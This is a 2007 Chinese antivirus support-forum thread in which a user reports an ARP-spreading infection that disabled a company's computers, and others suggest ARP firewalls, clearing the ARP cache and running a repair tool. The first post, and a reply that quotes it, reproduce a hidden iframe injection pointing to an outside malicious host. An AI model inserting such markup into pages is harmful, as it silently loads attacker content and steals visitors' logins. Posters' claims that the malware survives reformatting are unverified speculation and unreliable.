WEB思想 - 2007-6-29 12:59:00
中招后,在客户端的IE里自动插入这个网页木马:
<iframe src='http://123.8w8w8w.com.cn/help.htm' width=50 height=0></iframe>
后果是,造成无法浏览网页,特别是登陆不了网站后台,它已经转向了你在提交用户名和密码的地址,估计已经提交到他的数据库,此病毒如此恶毒。
厉害的不是这些,任何杀软根本对他无法清除~ 他能利用局域网进行复制和传播,也就是说你本机把所有硬盘都格式化,对他也是不能清除,只要你有网络,他就能生存!公司几十台电脑,现在已经全部瘫痪了,到现在瑞星和卡卡全都死掉了,根本启动不了,对了,它和帕虫一样劫持所有杀软,怎么样?够可怕吧,而且,AV和帕虫的专杀对它一点作用都没有,现在只能在线等待瑞星的解决~
瑞星啊,你们的上帝在承受痛苦,希望你能快点拿出解决方案!
风的唏嘘 - 2007-6-29 13:18:00
用arp防火墙试一下
WEB思想 - 2007-6-29 13:27:00
不用测了,三天了,重新做了几台电脑了,只要一连网马上就重招!
局域网,我们不可能都关闭啊~ 公司业务全部停滞了~~ 瑞星,你在做什么?不是也中招了吧?
jiuge捷 - 2007-6-29 13:33:00
用什么漏洞传播的?反正我点了米事,前几天群里有人中了,解决办法是升级成vista。。。应该是arp欺骗才重复感染吧,断网重装后装个ssm,然后开网打补丁,我是这么想的。。
风的唏嘘 - 2007-6-29 13:36:00
别发牢骚了,对付这种病毒必须断开局域网,光重做几台机器哪怕100遍也没用,即使杀毒软件可以查杀,按原则也是要这么做的,因为你不有保证所有的机器查杀进度都是统一的
WEB思想 - 2007-6-29 13:37:00
开网,一台一台单独上网? 几十台电脑弄到什么时候去,现在网上连个正确方法都没有,没办法!
风的唏嘘 - 2007-6-29 13:41:00
所以你应该用arp -d *命令先清空arp缓存,然后装个arp防火墙试试,而且估计IE可能有漏洞
苹果小柚子 - 2007-6-29 13:47:00
给个样本好不 我分析下个 给你 个解决方案
378258879 qq
baohe - 2007-6-29 14:17:00
| 引用: |
【WEB思想的贴子】中招后,在客户端的IE里自动插入这个网页木马:
<iframe src=''http://123.8w8w8w.com.cn/help.htm'' width=50 height=0></iframe>
后果是,造成无法浏览网页,特别是登陆不了网站后台,它已经转向了你在提交用户名和密码的地址,估计已经提交到他的数据库,此病毒如此恶毒。
厉害的不是这些,任何杀软根本对他无法清除~ 他能利用局域网进行复制和传播,也就是说你本机把所有硬盘都格式化,对他也是不能清除,只要你有网络,他就能生存!公司几十台电脑,现在已经全部瘫痪了,到现在瑞星和卡卡全都死掉了,根本启动不了,对了,它和帕虫一样劫持所有杀软,怎么样?够可怕吧,而且,AV和帕虫的专杀对它一点作用都没有,现在只能在线等待瑞星的解决~
瑞星啊,你们的上帝在承受痛苦,希望你能快点拿出解决方案!
……………… |
附件:
1558472007629140837.jpg
HOSTのS - 2007-6-29 14:22:00
网址打不开
风印 - 2007-7-5 21:06:00
不知道版主是什么意思?这个地址的确不能访问,难道这个地址不能访问这个问题就不需要解决了么?我头几天也碰到过这样的问题,现在只能用arp访火墙来暂时解决,不过你们杀毒软件公司也应该尽快的拿出解决方案来!
haohe的fans - 2007-7-5 21:15:00
========Content========
http://www.kztechs.com/sreng/download.html 下载System Repair Engineer
1 解压缩sreng2.zip
2 运行SREng.exe
3 智能扫描=》扫描=》保存报告
4 把日志中的报告完整拷贝贴上来,不要修改(一次发不完请分贴发上来)
5 扫日志的时候尽量把不必要的软件关闭 如QQ TM等
© 2000 - 2026 Rising Corp. Ltd.